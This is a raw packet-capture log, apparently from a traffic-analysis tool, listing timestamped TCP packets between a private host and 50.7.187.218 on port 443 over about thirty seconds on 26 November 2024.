                                                    Nov 26, 2024 09:40:12.121511936 CET4434987650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:12.301157951 CET49880443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.301203966 CET4434988050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:12.301284075 CET49880443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.301378012 CET49880443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.301451921 CET4434988050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:12.301508904 CET49880443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.311728954 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.311759949 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:12.311882019 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.312261105 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:12.312277079 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:13.726596117 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:13.726667881 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:13.728626966 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:13.728636026 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:13.728957891 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:13.730398893 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:13.775331974 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.246381044 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.246450901 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.246500015 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.246805906 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.246824026 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.246870995 CET49881443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.246876001 CET4434988150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.419118881 CET49885443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.419178009 CET4434988550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.419270039 CET49885443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.419455051 CET49885443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.419503927 CET4434988550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.419553041 CET49885443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.472758055 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.472799063 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:14.472867012 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.473264933 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:14.473278046 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:15.936775923 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:15.936903954 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:15.938478947 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:15.938488007 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:15.938733101 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:15.940036058 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:15.987335920 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:16.467854023 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:16.467927933 CET4434988750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:16.468106985 CET49887443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:16.468396902 CET49887443192.168.2.450.7.187.218
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 09:40:16.468420029 CET  443          49887      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:16.468426943 CET  49887        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.468432903 CET  443          49887      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:16.639839888 CET  49893        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.639882088 CET  443          49893      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:16.640017986 CET  49893        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.640166044 CET  49893        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.640212059 CET  443          49893      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:16.640300989 CET  49893        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.649571896 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.649611950 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:16.649688959 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.650047064 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:16.650057077 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.061813116 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.061956882 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.063421965 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.063433886 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.063714981 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.064996004 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.111336946 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.581448078 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.581525087 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.581598997 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.581865072 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.581871986 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.581890106 CET  49894        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.581895113 CET  443          49894      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.753129959 CET  49899        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.753176928 CET  443          49899      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.753290892 CET  49899        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.753453016 CET  49899        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.753509998 CET  443          49899      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.753576994 CET  49899        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.762514114 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.762567043 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:18.762653112 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.763014078 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:18.763025999 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.180788040 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.180941105 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.182225943 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.182235956 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.182473898 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.183588028 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.231329918 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.704873085 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.704937935 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.705005884 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.708117962 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.708137989 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.708151102 CET  49900        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.708158016 CET  443          49900      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.876952887 CET  49906        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.877000093 CET  443          49906      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.877095938 CET  49906        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.877264977 CET  49906        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.877310991 CET  443          49906      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.877371073 CET  49906        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.887434959 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.887489080 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:20.887557983 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.887974024 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:20.887984991 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.438719034 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.438790083 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.440203905 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.440217972 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.440495014 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.442292929 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.487334967 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.957535028 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.957597017 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.957655907 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.957858086 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.957882881 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:22.957901001 CET  49907        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:22.957907915 CET  443          49907      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:23.128981113 CET  49913        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.129029989 CET  443          49913      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:23.129158974 CET  49913        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.276551008 CET  49913        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.276614904 CET  443          49913      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:23.276870012 CET  49913        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.306027889 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.306082964 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:23.306209087 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.330456018 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:23.330478907 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:24.742048979 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:24.742214918 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:24.743979931 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:24.743987083 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:24.744275093 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:24.745551109 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:24.787369013 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.260890961 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.260958910 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.261172056 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.261343956 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.261367083 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.261377096 CET  49914        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.261384964 CET  443          49914      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.436742067 CET  49920        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.436789036 CET  443          49920      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.436872005 CET  49920        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.436980009 CET  49920        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.437021971 CET  443          49920      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.437139034 CET  49920        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.445740938 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.445791006 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:25.445902109 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.446182966 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:25.446196079 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:26.861186028 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:26.861373901 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:26.862956047 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:26.862976074 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:26.863246918 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:26.864598989 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:26.911336899 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.459259987 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.459337950 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.459471941 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.459804058 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.459825039 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.459842920 CET  49921        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.459851980 CET  443          49921      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.631629944 CET  49927        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.631680965 CET  443          49927      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.631783009 CET  49927        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.632282019 CET  49927        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.632335901 CET  443          49927      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.632405043 CET  49927        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.640379906 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.640417099 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:27.640507936 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.640799046 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:27.640814066 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.007213116 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.007333994 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.008610964 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.008615971 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.008871078 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.010061026 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.051330090 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.517606020 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.517680883 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.517745972 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.518249035 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.518249035 CET  49928        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.518265009 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.518274069 CET  443          49928      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.688102007 CET  49934        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.688149929 CET  443          49934      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.688280106 CET  49934        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.692106962 CET  49934        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.692176104 CET  443          49934      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.692248106 CET  49934        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.795531988 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.795588017 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:29.795670033 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.796000004 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:29.796016932 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.208295107 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.208416939 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.209733009 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.209743977 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.210324049 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.211556911 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.255330086 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.726691961 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.726864100 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.726986885 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.726988077 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.727020979 CET  49935        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.727030993 CET  443          49935      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.892662048 CET  49941        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.892698050 CET  443          49941      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.892781019 CET  49941        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.896037102 CET  49941        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.896070004 CET  443          49941      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.896341085 CET  49941        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.913363934 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.913417101 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:31.913485050 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.913878918 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:31.913889885 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.341116905 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.341233969 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.342633009 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.342653990 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.342897892 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.344466925 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.387336016 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.861290932 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.861382961 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.861515999 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.861844063 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.861867905 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:33.861884117 CET  49942        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:33.861890078 CET  443          49942      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:34.029400110 CET  49948        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.029442072 CET  443          49948      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:34.029531002 CET  49948        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.029649019 CET  49948        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.029695988 CET  443          49948      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:34.029751062 CET  49948        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.038420916 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.038512945 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:34.038623095 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.038974047 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:34.039028883 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.405199051 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.405275106 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.406537056 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.406548023 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.406789064 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.407991886 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.455333948 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.913198948 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.913276911 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.913347006 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.913573027 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.913579941 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:35.913600922 CET  49949        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:35.913605928 CET  443          49949      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:36.078970909 CET  49954        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.079022884 CET  443          49954      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:36.079165936 CET  49954        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.079272032 CET  49954        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.079310894 CET  443          49954      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:36.079379082 CET  49954        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.088102102 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.088169098 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:36.088269949 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.088782072 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:36.088805914 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:37.498001099 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:37.498235941 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:37.567622900 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:37.567656994 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:37.568006992 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:37.569222927 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:37.611335039 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.078931093 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.078994036 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.079040051 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.079265118 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.079287052 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.079301119 CET  49955        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.079308033 CET  443          49955      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.242444992 CET  49961        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.242501020 CET  443          49961      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.242647886 CET  49961        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.242856979 CET  49961        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.242917061 CET  443          49961      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.242978096 CET  49961        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.251384974 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.251431942 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:38.251538992 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.251899004 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:38.251910925 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:39.660824060 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:39.661000013 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:39.662770987 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:39.662817001 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:39.663084984 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:39.664500952 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:39.707343102 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.179619074 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.179805040 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.179893017 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.180259943 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.180279016 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.180291891 CET  49962        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.180299044 CET  443          49962      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.352231026 CET  49968        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.352272034 CET  443          49968      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.352472067 CET  49968        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.630347013 CET  49968        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.630419970 CET  443          49968      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.630492926 CET  49968        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.646051884 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.646099091 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:40.646172047 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.646734953 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:40.646744967 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.015738010 CET  443          49969      50.7.187.218    192.168.2.4
Nov 26, 2024 09:40:42.015913010 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.017303944 CET  49969        443        192.168.2.4     50.7.187.218
Nov 26, 2024 09:40:42.017353058 CET  443          49969      50.7.187.218    192.168.2.4
